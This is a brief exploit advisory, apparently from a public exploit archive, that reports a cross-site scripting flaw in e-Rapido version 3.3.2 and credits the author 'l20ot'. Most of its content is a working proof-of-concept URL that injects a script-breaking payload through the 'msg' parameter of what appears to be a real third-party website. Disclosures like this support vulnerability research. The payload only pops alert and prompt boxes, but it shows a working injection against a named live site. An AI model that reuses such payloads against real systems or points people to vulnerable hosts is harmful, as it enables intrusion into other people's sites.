e-Rapido version 3.3.2 suffers from a cross site scripting vulnerability.
547a7d9b3392533531e7498a23d65aa3e1503d23b13f582084e9f8cb110337f3
# Exploit Title: e-Rapido v3.3.2 Cross Site Scripting
# Date: 13.03.2012
# Author: l20ot
# Web Browser : Mozilla Firefox
# Blog : http://www.twitter.com/l20ot
------------------------------------------------------
msg Parameter is vulerable to XSS!
Demo: http://www.armazemdosfiltros.com.br/erapido/index.php?msg=");prompt(2);alert("